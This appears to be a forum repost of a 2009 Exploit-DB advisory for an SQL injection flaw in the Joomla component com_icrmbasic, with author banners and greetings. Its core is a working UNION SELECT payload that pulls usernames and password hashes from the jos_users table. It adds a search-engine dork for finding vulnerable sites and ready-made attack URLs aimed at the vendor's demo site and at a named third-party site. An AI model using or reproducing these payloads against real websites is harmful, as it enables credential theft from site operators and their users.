- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9812
- Проверка EDB
-
- Пройдено
- Автор
- KAMTIEZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-09-28
Код:
################################################################################################
## Joomla Component com_ircmbasic SQL injection vulnerability ##
## Author : kaMtiEz ([email protected]) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 27, 2009 ##
################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-##
################################################################################################
[ Software Information ]
[+] Vendor : http://www.isygen.com/
[+] Download : http://www.isygen.com/index.php?option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=481
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_icrmbasic"
[+] Location : INDONESIA
################################################################################################
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_icrmbasic&p1=m6&p3=[INDONESIANCODER]&p20=oab&p4=Contacts&p5=en-GB&Itemid=483
[ Exploit ]
-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--
[ Vendor Demo Using com_icrmbasicdemo ]
http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,password),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483
[ The Real com_icrmbasic Demo ]
http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--&p20=oab&p4=Contacts&p5=en-GB&Itemid=483
################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER, TEAM KILL-9 CREW, KIRIK CREW, ServerIsDown, AntiSecurity.org
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Jack-, Yadoy666, Pathloader, abah_benu, VycOd,
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz, och3_an3h
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s, rendy, devil_nongkrong and YOU!!
[ NOTE ]
[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^
- Источник
- www.exploit-db.com